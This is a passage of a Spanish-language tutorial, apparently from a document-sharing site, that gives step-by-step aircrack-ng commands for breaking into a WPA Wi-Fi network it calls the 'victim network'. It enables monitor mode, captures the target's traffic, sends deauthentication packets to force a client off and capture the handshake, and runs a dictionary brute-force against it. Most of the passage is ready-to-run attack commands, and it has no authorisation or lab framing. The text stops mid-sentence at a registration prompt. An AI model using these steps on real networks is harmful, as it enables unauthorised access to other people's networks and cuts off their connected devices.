francia
Cita: Ocultar
airmon-ng start wlan0
2. Paso: Ahora vamos a buscar redes disponibles para eso ejecutamos elsiguiente comando:
Cita: Ocultar
airodump-ng mon0
3. Paso: Aquí vamos a capturar la red víctima para posteriormente obtener el "Handshake"
Cita: Ocultar
airodump-ng -w red --bssid00:11:22:33:44:55 -c 11 mon0
Donde:
-w = nombre del archivo .cap (donde se guarda la captura)
--bssid = dirección mac de la red víctima
-c = canal de la red víctima
Tenemos qué tener un clienteconectado en la red víctima, para sacar el "Handshake"
4. Paso: Ahora abrimos una 2° Terminal y vamos a capturar el "Handshake". el handshake es un paquete especial qué se recibe cuando seconecta al modem. Tenemos qué desconectar al cliente (station) Para esto ejecutamos el siguiente comando:
Cita: Ocultar
aireplay-ng --deauth 20 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0
Donde:--deauth = representa las veces qué se desconecta al dispositivo (station)
-a = señala la dirección mac de la red víctima
-c = señala la dirección mac del cliente a desconectar
5.Paso: Vamos a comprobar si capturamos el "handshake" para esto vamos a la primera terminal y nos fijamos en la parte superior derecha (a un lado de la fecha y hora) lo siguiente: "WPA handshake"
Una vezcapturado el "handshake" procedemos a hacer el ataque con el diccionario a fuerza bruta, para esto se necesitan los diccionarios. A continuación les dejo los links:
Son 10 diccionarios por Mediafire:Download
6. Paso: Ya qué tengamos los diccionarios, procedemos a ejecutar aircrack-ng
Cita: Ocultar
aircrack-ng -a 2 -w ruta/al/diccionario red-01.cap
ruta/al/diccionario red-01.cap ejemplo
Root/SectorGnu/diccionario red-01.cap depende de donde guardaste el archivo
Y esperan a qué consiga la clave, sean pacientes.
Nota: No estoy seguro de que funcione para...
Regístrate para leer el documento completo.